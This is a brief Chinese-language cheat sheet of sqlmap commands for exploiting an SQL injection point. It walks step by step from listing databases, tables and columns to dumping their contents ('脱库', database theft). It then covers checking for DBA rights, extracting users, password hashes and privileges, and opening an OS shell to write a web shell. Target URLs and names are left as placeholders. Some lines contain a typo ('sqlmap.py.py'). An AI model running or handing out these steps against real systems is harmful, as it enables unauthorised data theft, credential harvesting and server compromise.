1.查看数据库: sqlmap.py -u 存在注入的URL地址 --dbs sqlmap.py -u "" --dbs
2.接下来查看表名: sqlmap.py -u 存在注入的URL地址 -D 数据库名 --tables sqlmap.py -u "" -D "" --tables
3.查看字段: sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 --columns sqlmap.py -u "" -D "" -T "" --columns
4.爆字段内容 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名 --dump sqlmap.py -u "" -D "" -T "" -C "" --dump
5.脱库 sqlmap.py -u 存在注入的URL地址 -D 数据库名 -T 表名 -C 列名1,列名2 --dump --
threads=10 --start=1 --stop=3 sqlmap.py -u "" -D "" -T "" -C "","" --dump --threads=10 --start=1 --stop=3
python sqlmap.py.py -u 注入地址 --is-dba 判断当前用户是不是DBA
python sqlmap.py.py -u 注入地址 --users 查看当前用户
python sqlmap.py.py -u 注入地址 --passwords 查看密码
python sqlmap.py.py -u 注入地址 --privileges 查看权限
python sqlmap.py.py -u 注入地址 --os-shell 写web shell